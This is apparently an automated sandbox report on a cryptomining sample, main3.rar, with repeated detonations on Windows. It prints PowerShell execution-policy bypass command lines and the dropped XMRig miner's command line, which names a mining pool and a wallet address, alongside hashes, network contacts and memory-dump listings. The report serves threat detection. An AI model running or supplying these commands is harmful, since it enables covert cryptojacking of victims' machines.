Malware Analysis Report

2024-11-16 12:09

Sample ID 240601-w5nxtabh58
Target main3.rar
SHA256 4989b2b14eed528c576634ce1f8a74caa71ae3c67773a1e7758a6ab6f51f5b88
Tags
xmrig execution miner
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral16

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral18

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral23

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral26

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral3

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral10

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral13

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral14

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral4

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral9

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral11

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral21

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral29

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral15

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral20

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral22

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral25

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral27

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral5

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral19

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral30

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral32

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral7

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral8

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral17

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral6

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral12

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral24

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral31

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral28

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

4989b2b14eed528c576634ce1f8a74caa71ae3c67773a1e7758a6ab6f51f5b88

Threat Level: Known bad

The file main3.rar was found to be: Known bad.

Malicious Activity Summary

xmrig execution miner

xmrig

XMRig Miner payload

Blocklisted process makes network request

Executes dropped EXE

Command and Scripting Interpreter: PowerShell

Suspicious behavior: EnumeratesProcesses

Suspicious use of AdjustPrivilegeToken

Suspicious use of FindShellTrayWindow

Suspicious use of WriteProcessMemory

Suspicious behavior: LoadsDriver

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-06-01 18:30

Signatures

N/A

Analysis: behavioral16

Detonation Overview

Submitted

2024-06-01 18:30

Reported

2024-06-10 16:40

Platform

win11-20240426-en

Max time kernel

1790s

Max time network

1774s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (13) - copia.ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (13) - copia.ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -o gulf.moneroocean.stream:10128 -u 45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 gulf.moneroocean.stream udp
DE 149.102.143.109:10128 gulf.moneroocean.stream tcp

Files

memory/2280-0-0x00007FFEBB1D3000-0x00007FFEBB1D5000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_0dqvjwge.a13.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/2280-9-0x00000198B3E00000-0x00000198B3E22000-memory.dmp

memory/2280-10-0x00007FFEBB1D0000-0x00007FFEBBC92000-memory.dmp

memory/2280-11-0x00007FFEBB1D0000-0x00007FFEBBC92000-memory.dmp

memory/2280-12-0x00007FFEBB1D0000-0x00007FFEBBC92000-memory.dmp

memory/2280-14-0x00000198B3EA0000-0x00000198B3EB2000-memory.dmp

memory/2280-15-0x00000198B3E90000-0x00000198B3E9A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/4452-46-0x000001ACACAA0000-0x000001ACACAC0000-memory.dmp

memory/4452-47-0x000001ACACAF0000-0x000001ACACB10000-memory.dmp

memory/4452-48-0x00007FF6D0210000-0x00007FF6D0E43000-memory.dmp

memory/2280-49-0x00007FFEBB1D0000-0x00007FFEBBC92000-memory.dmp

memory/2280-50-0x00007FFEBB1D3000-0x00007FFEBB1D5000-memory.dmp

memory/4452-52-0x000001ACACB30000-0x000001ACACB50000-memory.dmp

memory/4452-51-0x000001ACACB10000-0x000001ACACB30000-memory.dmp

memory/4452-53-0x00007FF6D0210000-0x00007FF6D0E43000-memory.dmp

memory/4452-54-0x00007FF6D0210000-0x00007FF6D0E43000-memory.dmp

memory/4452-55-0x00007FF6D0210000-0x00007FF6D0E43000-memory.dmp

memory/4452-57-0x000001ACACB30000-0x000001ACACB50000-memory.dmp

memory/4452-56-0x000001ACACB10000-0x000001ACACB30000-memory.dmp

memory/4452-58-0x00007FF6D0210000-0x00007FF6D0E43000-memory.dmp

memory/4452-59-0x00007FF6D0210000-0x00007FF6D0E43000-memory.dmp

memory/4452-60-0x00007FF6D0210000-0x00007FF6D0E43000-memory.dmp

memory/4452-61-0x00007FF6D0210000-0x00007FF6D0E43000-memory.dmp

memory/4452-62-0x00007FF6D0210000-0x00007FF6D0E43000-memory.dmp

memory/4452-63-0x00007FF6D0210000-0x00007FF6D0E43000-memory.dmp

memory/4452-64-0x00007FF6D0210000-0x00007FF6D0E43000-memory.dmp

memory/4452-65-0x00007FF6D0210000-0x00007FF6D0E43000-memory.dmp

memory/4452-66-0x00007FF6D0210000-0x00007FF6D0E43000-memory.dmp

memory/4452-67-0x00007FF6D0210000-0x00007FF6D0E43000-memory.dmp

memory/4452-68-0x00007FF6D0210000-0x00007FF6D0E43000-memory.dmp

memory/4452-69-0x00007FF6D0210000-0x00007FF6D0E43000-memory.dmp

memory/4452-70-0x00007FF6D0210000-0x00007FF6D0E43000-memory.dmp

memory/4452-71-0x00007FF6D0210000-0x00007FF6D0E43000-memory.dmp

memory/4452-72-0x00007FF6D0210000-0x00007FF6D0E43000-memory.dmp

memory/4452-73-0x00007FF6D0210000-0x00007FF6D0E43000-memory.dmp

memory/4452-74-0x00007FF6D0210000-0x00007FF6D0E43000-memory.dmp

memory/4452-75-0x00007FF6D0210000-0x00007FF6D0E43000-memory.dmp

memory/4452-76-0x00007FF6D0210000-0x00007FF6D0E43000-memory.dmp

memory/4452-77-0x00007FF6D0210000-0x00007FF6D0E43000-memory.dmp

memory/4452-78-0x00007FF6D0210000-0x00007FF6D0E43000-memory.dmp

memory/4452-79-0x00007FF6D0210000-0x00007FF6D0E43000-memory.dmp

memory/4452-80-0x00007FF6D0210000-0x00007FF6D0E43000-memory.dmp

memory/4452-81-0x00007FF6D0210000-0x00007FF6D0E43000-memory.dmp

memory/4452-82-0x00007FF6D0210000-0x00007FF6D0E43000-memory.dmp

memory/4452-83-0x00007FF6D0210000-0x00007FF6D0E43000-memory.dmp

memory/4452-84-0x00007FF6D0210000-0x00007FF6D0E43000-memory.dmp

memory/4452-85-0x00007FF6D0210000-0x00007FF6D0E43000-memory.dmp

memory/4452-86-0x00007FF6D0210000-0x00007FF6D0E43000-memory.dmp

memory/4452-87-0x00007FF6D0210000-0x00007FF6D0E43000-memory.dmp

memory/4452-88-0x00007FF6D0210000-0x00007FF6D0E43000-memory.dmp

memory/4452-89-0x00007FF6D0210000-0x00007FF6D0E43000-memory.dmp

memory/4452-90-0x00007FF6D0210000-0x00007FF6D0E43000-memory.dmp

memory/4452-91-0x00007FF6D0210000-0x00007FF6D0E43000-memory.dmp

memory/4452-92-0x00007FF6D0210000-0x00007FF6D0E43000-memory.dmp

memory/4452-93-0x00007FF6D0210000-0x00007FF6D0E43000-memory.dmp

memory/4452-94-0x00007FF6D0210000-0x00007FF6D0E43000-memory.dmp

memory/4452-95-0x00007FF6D0210000-0x00007FF6D0E43000-memory.dmp

memory/4452-96-0x00007FF6D0210000-0x00007FF6D0E43000-memory.dmp

memory/4452-97-0x00007FF6D0210000-0x00007FF6D0E43000-memory.dmp

memory/4452-98-0x00007FF6D0210000-0x00007FF6D0E43000-memory.dmp

memory/4452-99-0x00007FF6D0210000-0x00007FF6D0E43000-memory.dmp

memory/4452-100-0x00007FF6D0210000-0x00007FF6D0E43000-memory.dmp

memory/4452-101-0x00007FF6D0210000-0x00007FF6D0E43000-memory.dmp

memory/4452-102-0x00007FF6D0210000-0x00007FF6D0E43000-memory.dmp

memory/4452-103-0x00007FF6D0210000-0x00007FF6D0E43000-memory.dmp

memory/4452-104-0x00007FF6D0210000-0x00007FF6D0E43000-memory.dmp

memory/4452-105-0x00007FF6D0210000-0x00007FF6D0E43000-memory.dmp

memory/4452-106-0x00007FF6D0210000-0x00007FF6D0E43000-memory.dmp

memory/4452-107-0x00007FF6D0210000-0x00007FF6D0E43000-memory.dmp

memory/4452-108-0x00007FF6D0210000-0x00007FF6D0E43000-memory.dmp

memory/4452-109-0x00007FF6D0210000-0x00007FF6D0E43000-memory.dmp

memory/4452-110-0x00007FF6D0210000-0x00007FF6D0E43000-memory.dmp

memory/4452-111-0x00007FF6D0210000-0x00007FF6D0E43000-memory.dmp

memory/4452-112-0x00007FF6D0210000-0x00007FF6D0E43000-memory.dmp

memory/4452-113-0x00007FF6D0210000-0x00007FF6D0E43000-memory.dmp

memory/4452-114-0x00007FF6D0210000-0x00007FF6D0E43000-memory.dmp

memory/4452-115-0x00007FF6D0210000-0x00007FF6D0E43000-memory.dmp

memory/4452-116-0x00007FF6D0210000-0x00007FF6D0E43000-memory.dmp

Analysis: behavioral18

Detonation Overview

Submitted

2024-06-01 18:30

Reported

2024-06-10 16:42

Platform

win10-20240404-en

Max time kernel

1800s

Max time network

1793s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (14) - copia.ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: LoadsDriver

Description Indicator Process Target
N/A N/A N/A N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (14) - copia.ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -o gulf.moneroocean.stream:10128 -u 45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.111.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.111.199.185.in-addr.arpa udp
US 8.8.8.8:53 gulf.moneroocean.stream udp
DE 149.102.143.109:10128 gulf.moneroocean.stream tcp
US 8.8.8.8:53 109.143.102.149.in-addr.arpa udp
US 8.8.8.8:53 21.236.111.52.in-addr.arpa udp
US 8.8.8.8:53 15.173.189.20.in-addr.arpa udp
US 8.8.8.8:53 0.205.248.87.in-addr.arpa udp

Files

memory/2900-2-0x00007FF8E5173000-0x00007FF8E5174000-memory.dmp

memory/2900-5-0x00007FF8E5170000-0x00007FF8E5B5C000-memory.dmp

memory/2900-6-0x000002719C0D0000-0x000002719C0F2000-memory.dmp

memory/2900-9-0x00007FF8E5170000-0x00007FF8E5B5C000-memory.dmp

memory/2900-10-0x000002719C290000-0x000002719C306000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_kyyfydac.nof.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/2900-25-0x00007FF8E5170000-0x00007FF8E5B5C000-memory.dmp

memory/2900-48-0x000002719C410000-0x000002719C422000-memory.dmp

memory/2900-61-0x000002719C160000-0x000002719C16A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/2312-90-0x000001C7D9790000-0x000001C7D97B0000-memory.dmp

memory/2900-91-0x00007FF8E5173000-0x00007FF8E5174000-memory.dmp

memory/2900-92-0x00007FF8E5170000-0x00007FF8E5B5C000-memory.dmp

memory/2312-93-0x00007FF610D70000-0x00007FF6119A3000-memory.dmp

memory/2900-94-0x00007FF8E5170000-0x00007FF8E5B5C000-memory.dmp

memory/2312-95-0x00007FF610D70000-0x00007FF6119A3000-memory.dmp

memory/2312-96-0x00007FF610D70000-0x00007FF6119A3000-memory.dmp

memory/2312-97-0x00007FF610D70000-0x00007FF6119A3000-memory.dmp

memory/2312-98-0x00007FF610D70000-0x00007FF6119A3000-memory.dmp

memory/2312-99-0x00007FF610D70000-0x00007FF6119A3000-memory.dmp

memory/2312-100-0x00007FF610D70000-0x00007FF6119A3000-memory.dmp

memory/2312-101-0x00007FF610D70000-0x00007FF6119A3000-memory.dmp

memory/2312-102-0x00007FF610D70000-0x00007FF6119A3000-memory.dmp

memory/2312-103-0x00007FF610D70000-0x00007FF6119A3000-memory.dmp

memory/2312-104-0x00007FF610D70000-0x00007FF6119A3000-memory.dmp

memory/2312-105-0x00007FF610D70000-0x00007FF6119A3000-memory.dmp

memory/2312-106-0x00007FF610D70000-0x00007FF6119A3000-memory.dmp

memory/2312-107-0x00007FF610D70000-0x00007FF6119A3000-memory.dmp

memory/2312-108-0x00007FF610D70000-0x00007FF6119A3000-memory.dmp

memory/2312-109-0x00007FF610D70000-0x00007FF6119A3000-memory.dmp

memory/2312-110-0x00007FF610D70000-0x00007FF6119A3000-memory.dmp

memory/2312-111-0x00007FF610D70000-0x00007FF6119A3000-memory.dmp

memory/2312-112-0x00007FF610D70000-0x00007FF6119A3000-memory.dmp

memory/2312-113-0x00007FF610D70000-0x00007FF6119A3000-memory.dmp

memory/2312-114-0x00007FF610D70000-0x00007FF6119A3000-memory.dmp

memory/2312-115-0x00007FF610D70000-0x00007FF6119A3000-memory.dmp

memory/2312-116-0x00007FF610D70000-0x00007FF6119A3000-memory.dmp

memory/2312-117-0x00007FF610D70000-0x00007FF6119A3000-memory.dmp

memory/2312-118-0x00007FF610D70000-0x00007FF6119A3000-memory.dmp

memory/2312-119-0x00007FF610D70000-0x00007FF6119A3000-memory.dmp

memory/2312-120-0x00007FF610D70000-0x00007FF6119A3000-memory.dmp

memory/2312-121-0x00007FF610D70000-0x00007FF6119A3000-memory.dmp

memory/2312-122-0x00007FF610D70000-0x00007FF6119A3000-memory.dmp

memory/2312-123-0x00007FF610D70000-0x00007FF6119A3000-memory.dmp

memory/2312-124-0x00007FF610D70000-0x00007FF6119A3000-memory.dmp

memory/2312-125-0x00007FF610D70000-0x00007FF6119A3000-memory.dmp

memory/2312-126-0x00007FF610D70000-0x00007FF6119A3000-memory.dmp

memory/2312-127-0x00007FF610D70000-0x00007FF6119A3000-memory.dmp

memory/2312-128-0x00007FF610D70000-0x00007FF6119A3000-memory.dmp

memory/2312-129-0x00007FF610D70000-0x00007FF6119A3000-memory.dmp

memory/2312-130-0x00007FF610D70000-0x00007FF6119A3000-memory.dmp

memory/2312-131-0x00007FF610D70000-0x00007FF6119A3000-memory.dmp

memory/2312-132-0x00007FF610D70000-0x00007FF6119A3000-memory.dmp

memory/2312-133-0x00007FF610D70000-0x00007FF6119A3000-memory.dmp

memory/2312-134-0x00007FF610D70000-0x00007FF6119A3000-memory.dmp

memory/2312-135-0x00007FF610D70000-0x00007FF6119A3000-memory.dmp

memory/2312-136-0x00007FF610D70000-0x00007FF6119A3000-memory.dmp

memory/2312-137-0x00007FF610D70000-0x00007FF6119A3000-memory.dmp

memory/2312-138-0x00007FF610D70000-0x00007FF6119A3000-memory.dmp

memory/2312-139-0x00007FF610D70000-0x00007FF6119A3000-memory.dmp

memory/2312-140-0x00007FF610D70000-0x00007FF6119A3000-memory.dmp

memory/2312-141-0x00007FF610D70000-0x00007FF6119A3000-memory.dmp

memory/2312-142-0x00007FF610D70000-0x00007FF6119A3000-memory.dmp

memory/2312-143-0x00007FF610D70000-0x00007FF6119A3000-memory.dmp

memory/2312-144-0x00007FF610D70000-0x00007FF6119A3000-memory.dmp

memory/2312-145-0x00007FF610D70000-0x00007FF6119A3000-memory.dmp

memory/2312-146-0x00007FF610D70000-0x00007FF6119A3000-memory.dmp

memory/2312-147-0x00007FF610D70000-0x00007FF6119A3000-memory.dmp

memory/2312-148-0x00007FF610D70000-0x00007FF6119A3000-memory.dmp

memory/2312-149-0x00007FF610D70000-0x00007FF6119A3000-memory.dmp

memory/2312-150-0x00007FF610D70000-0x00007FF6119A3000-memory.dmp

memory/2312-151-0x00007FF610D70000-0x00007FF6119A3000-memory.dmp

memory/2312-152-0x00007FF610D70000-0x00007FF6119A3000-memory.dmp

memory/2312-153-0x00007FF610D70000-0x00007FF6119A3000-memory.dmp

memory/2312-154-0x00007FF610D70000-0x00007FF6119A3000-memory.dmp

memory/2312-155-0x00007FF610D70000-0x00007FF6119A3000-memory.dmp

memory/2312-156-0x00007FF610D70000-0x00007FF6119A3000-memory.dmp

Analysis: behavioral23

Detonation Overview

Submitted

2024-06-01 18:30

Reported

2024-06-10 16:44

Platform

win10v2004-20240508-en

Max time kernel

1586s

Max time network

1595s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (15) - copia.ps1"

Signatures

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (15) - copia.ps1"

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp

Files

memory/1788-0-0x00007FF849CA3000-0x00007FF849CA5000-memory.dmp

memory/1788-6-0x000002D8FA020000-0x000002D8FA042000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_suoxsbnw.ojt.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/1788-11-0x00007FF849CA0000-0x00007FF84A761000-memory.dmp

memory/1788-12-0x00007FF849CA0000-0x00007FF84A761000-memory.dmp

memory/1788-13-0x00007FF849CA0000-0x00007FF84A761000-memory.dmp

memory/1788-14-0x00007FF849CA0000-0x00007FF84A761000-memory.dmp

memory/1788-15-0x00007FF849CA0000-0x00007FF84A761000-memory.dmp

memory/1788-16-0x00007FF849CA3000-0x00007FF849CA5000-memory.dmp

memory/1788-17-0x00007FF849CA0000-0x00007FF84A761000-memory.dmp

memory/1788-18-0x00007FF849CA0000-0x00007FF84A761000-memory.dmp

Analysis: behavioral26

Detonation Overview

Submitted

2024-06-01 18:30

Reported

2024-06-10 16:46

Platform

win10-20240404-en

Max time kernel

1797s

Max time network

1803s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9) - copia.ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
